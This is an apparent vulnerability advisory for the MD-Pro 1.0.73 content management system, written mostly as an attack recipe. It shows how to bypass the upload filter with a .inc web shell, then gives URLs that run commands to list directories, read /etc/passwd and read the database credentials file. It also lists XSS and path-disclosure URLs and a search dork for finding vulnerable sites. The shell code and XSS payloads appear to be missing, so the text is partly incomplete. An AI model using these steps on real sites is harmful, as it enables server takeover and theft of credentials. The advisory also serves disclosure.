MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution / cross site scripting / path disclosure software: site: http://www.maxdev.com/ description: http://www.maxdev.com/AboutMD.phtml 1) remote code/commands execution: after registration goto "Downloads" page and click on "Add a download"... this is the message: "You are not authorized to use any of the following filetypes for uploading: .swf .jsp .php .php3 .php4 .phtml .pl .com .bat .exe" geez, and what about .inc , .pwml and .php2 or something (use imagination..) ? ;) type of files you can execute depends on server configuration should be better to set which type of files a user CAN upload... :) upload a file with .inc extension with this code inside: now list directories with: http://[target]/[path]/upload/dl/[filename].inc?c=ls%20-la see /etc/passwd file: http://[target]/[path]/upload/dl/[filename].inc?c=cat%20/etc/passwd see database username and password: http://[target]/[path]/upload/dl/[filename].inc?c=cat%20../. /config/md-config.php 2) XSS: http://[target]/[path]/modules.php?op=modload&name=subjects&file=print&print= http://[target]/[path]/modules.php?op=modload&name=Messages&file=bb_smilies&sitename= http://[target]/[path]/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename= http://[target]/[path]/javascript/openwindow.php?hlpfile=") 3) path disclosure: http://[target]/[path]/modules/Wiki/pnblocks/wiki.php http://[target]/[path]/modules/AutoTheme/ http://[target]/[path]/modules/Blocks/ http://[target]/[path]/modules/MySQL_Tools/admin.php http://[target]/[path]/md/modules/Permissions/pnadmin.php http://[target]/[path]/md/modules/Topics/ googledork: "Powered by MD-Pro" | "made with MD-Pro" rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it original advisory: http://rgod.altervista.org/maxdev1073.html